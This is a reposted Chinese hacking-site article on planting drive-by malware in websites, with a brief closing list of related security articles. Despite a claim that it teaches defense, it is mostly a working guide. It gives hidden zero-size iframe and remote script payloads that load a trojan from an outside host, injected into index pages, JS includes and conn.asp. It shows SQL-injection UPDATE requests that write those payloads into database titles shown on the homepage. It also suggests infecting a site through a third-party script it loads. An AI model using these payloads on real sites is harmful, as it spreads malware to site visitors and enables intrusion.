[转载]多姿多彩的网站挂马方式

简介:
信息来源:黑客基地

--------------------------------------------------------------------------
先说明一点,不是怎么教大家挂马,是让你学会挂马,怎么防守,怎么找马,怎么找关键字,怎么让你学会别人是通过什么方法挂到你的网站上的..
有利就有弊,随便怎么看吧。
--------------------------------------------------------------------------

这里我拿挂首页index.asp来举例子。

先说一说,得到webshell的挂马方法
一般的挂马的都是用框架,这是最基本的挂马方式,只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中
[url]http://www.fucksb.net/mm.htm[/url] 是我们的木马,下面就不一个一个提示了。
  
上面可能是一般的挂马方式,也是初学者的玩法,好了,再说深一点点的,那就是js文件,好多网站上,你查看源代码都会调用js文件,其中的语句为<script language=javascript src=./ad/ad.js></script>,想到了什么,这里也可以挂马,其中我们可以远程调用自己的js,比如:<script language=javascript src=http://www.fucksb.net/mm.js></script>这个mm.js就可以写木马了,怎么写呢,同样,我们还用最基本的iframe框架,不过在<script></script>之中可识别语言不是html,那怎么办呢,follow me,js文件可以这样写:document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");,这种形势,这时就可以执行此js中的代码了,当然了,说白了,其实全语句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

聪明的你可能发现了一点,好像不止是js文件哦~,只要在<script></script>之中,无论什么后缀的文件,只要里面写的语句可以被javascript识别就会执行,对的,比如<script src=http://www.fucksb.net/mm.test></script>,又如<script src=http://www.fucksb.net/mm.lala></script>管他的后缀是什么,只要里面写的语句正确就会被执行了。

  同样,如果首页调用其它网站,或者次级目录中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里挂马,可以是htm和js,随便哪种,这是比较隐蔽的玩法,这些适用于主页没有写权限的方法。

<script>同<iframe>2个相比较,好处是script整体挂马的代码长度比iframe小得多,很实用。说实用是在数据库方面,下面介绍。

    数据库挂马,这里我们拿mssql数据库为例子。

这里说的是首页调用到的数据库,比如新闻,论坛,公告,等等,一般是标题。这些需要经验去检测,举个例子,比如首页有一条新闻为:“明日开业”,那么鼠标点此新闻,地址栏打开的新窗口为news.asp?id=1,这种情况,这时,就可以判断此新闻是从数据库中调用的了,当然了,我们不说access,只说mssql。
首页,我们要有这个网站中的一个注入点,比如就点在vote.asp?id=123,同时,至少是Db_owner权限,这时如果要挂马可以不用取到webshell,因为如果我们的目的只在于挂马的话,而且有时,还得检测mssql数据库和web服务器不在同一个机器上,那挂马的方式就是更改数据库内容,这里我说的就是这种,如上面说的,首页显示的一条新闻标题为“明日开业”,如果首页显示的标题是“明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那这样的话,首页就会执行这段代码了,像这种情况,找到了注入点,就得找表名,如此新闻的表名为news,字段为title,id,等等,根据猜测,id=1时,暴出的字段title的值就为“明日开业”,那么90%就可以猜到了,首页调用的数据库的字段就为news表中的title,这时在注入点,可以大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--,这样就可以更改数据库了,前提是最少要少db_owner权限,当然也有时由于代码原因,也可以这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1,也可以...
这种方法是有问题的,实战中存在不少问题,因为一般的情况下,标题都是通过<table>来限制宽度,也就是说如果你的标题的长度超过了指定的长度,那么你的代码只能写一半,这样就不能执行了,所以挂马最好的方法是用<script>这种方法来挂马了,如:
vote.asp?id=123;update news set title='明日开业</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--长度有很大的减少,很不错。
  
  后台挂马
  通常注入等不到webshell,就只能靠进后台挂马。

  这里说的是进入了后台,但不能通过后台得到webshell,这时要仔细关察后台,像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码,等等,后台是灵活的,具体问题具体分析。不过有一点很重要,是不要打乱前台htm源文件里的代码逻辑,比如应该闭合前面的<a><img>"( 等这些符号,应该先闭合掉如</a></img>")。

  其它形式

  如一首页调用了<iframe src="http://blog.77169.com/vote.asp?id=1&";no=view width=100></iframe>此种形势,一样可以在vote.asp中直接写入iframe木马代码,如果调用的是<script src="http://blog.77169.com/vote.asp?id=1&";no=view width=100></script>在vote.asp写代码时,请用document.write("")这种格式写入,当然,如果被挂文件中还有调用的文件可以继续往深处写,如果你够狠的话,直接写到数据库配置文件中,如conn.asp,这样好多页面可以同时挂上你的一种木马了。
  当然这里也有js文件,一样原理。
  挂一个网站的马,不一定就得攻入他,有时没有方法的同时,可以考虑跨站。好多站用了别的站的js文件,如:<script src=http://www.163.com/user.js>这种情势,这时就可以考虑只拿163.com的权限就行了,只要能修改到user.js文件就可以挂到你要挂的站点了,同理,也有<iframe src=http://www.163.com/user.htm>此种情况,一样道理,剑走偏锋,达到目的,无论用什么招数了。
  
  服务器挂马
  这里简单说一个比较狠的吧.

  重定向任何调用的htm,js,等文件.













本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8534,如需转载请自行联系原作者



相关文章
|
2月前
|
云安全 域名解析 安全
网站被攻击有什么办法呢?
网站为什么会遭遇DDoS攻击?德迅云安全SCDN如何有效防御DDoS攻击?
|
6月前
|
安全 Linux 网络安全
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
|
Web App开发 安全 JavaScript
WordPress建站之如何从恶意重定向恶意软件黑客攻击中恢复
关于WordPress建站的问题,欢迎留言讨论,关注“六翼开源”专注WordPress建站服务。
WordPress建站之如何从恶意重定向恶意软件黑客攻击中恢复
|
安全 网络协议 5G
网站被攻击打不开页面如何解决
我的网站流量呈上升的趋势,经常被同行恶意攻击,但是我的网站还是没有垮,我就详细给遇到和我同样问题的朋友们分享我的网站到底是如何防御住黑客攻击的,因为正常的情况下,我们的客户端发送请求到达服务器端,如果你服务器没有处理好高频并发访问的话,很有可能被别人攻击,一旦被攻击之后,有可能你的服务器会瞬间CPU标高,标高之后,整个服务器直接瘫了垮了,那我们到底应该怎么去防御这种情况。
229 0
网站被攻击打不开页面如何解决
|
安全 搜索推荐
网站快照收录被黑客攻击劫持跳转
我们普通用户一般很难发现,今天有一个客户咨询我,说为什么他的一个网站的信息显示在一个菠菜网站上?我说这是人家利用了你的网站数据后被搜索引擎收录而留下的一个快照,快照是你的信息,打开却是违法信息,还有一种情况是快照是非法信息,而打开却是正常的网站信息,这种情况一般是网站被挂马或者域名遭到了劫持,在你 site搜索某个网站域名的时候,发现标题描述关键词全部被改掉了,点击以后会进入一个非法的网站页面,它替换掉了你被搜索引擎收录的快照信息并做了跳转,如果你自己在浏览器地址栏输入网址进去,并不会发现问题的所在,这种情况并不会直接破坏掉你网站的信息。
157 0
网站快照收录被黑客攻击劫持跳转
|
安全 JavaScript
网站安全防护之被恶意跳转博彩木马排查
访问站点只要后面目录带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转到博彩网站,如果是电脑PC浏览器,就会弹空白页访问站点,让你看不到跳转后的网址,只要域名后面地址带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转bc网站,如果是电脑浏览器,就会弹空白页,最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键
299 0
网站安全防护之被恶意跳转博彩木马排查
|
SQL 缓存 监控
网站老是被劫持到其他网站怎么办
越来越多的网站被劫持,像跳转到彩piao网站,du博网站的情况时有发生,很多人可能都会经历过,电脑打开网站,以及手机打开移动端网站都会跳转到其他网站上去,这个就是网站被劫持跳转,那么网站被跳转的背后究竟是因为什么呢? 攻击者为何要劫持跳转到其他网站呢?SINE安全公司针对于这些安全情况,分析为什么网站首页会被篡改,会跳转,道高一尺魔高一丈,才能解决问题。
711 0
网站老是被劫持到其他网站怎么办
|
SQL 安全 JavaScript
网站被黑和网站被入侵该如何更好的处理?
2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录与快照也被劫持成什么世界杯投注,以及博彩,赌博等等的内容,根据以上客户给我们反映的网站被黑的问题,我们Sine安全公司立即安排安全技术人员对客户网站被黑的情况进行了详细的网站安全检测与代码的人工安全审计,发现客户网站首页之前是经常的被篡改,客户只能删除掉首页文件,然后重新生成首页,实在是反复被篡改的没办法了,才找到我们SINE安全公司来处理网站的安全问题.
446 0
网站被黑和网站被入侵该如何更好的处理?
|
SQL 安全 前端开发
网站会员信息被黑客入侵攻击修改了数据怎么解决
2020春节即将来临,收到新聚合支付平台网站客户的求助电话给我们Sinesafe,反映支付订单状态被修改由原先未支付修改为已支付,导致商户那边直接发货给此订单会员了,商户和平台的损失较大,很多码商都不敢用此支付平台了,为了防止聚合支付系统继续被攻击,我们SINE安全大体情况了解后,立即安排从业十年的安全工程师,成立聚合、通道支付平台安全应急响应小组。
221 0
网站会员信息被黑客入侵攻击修改了数据怎么解决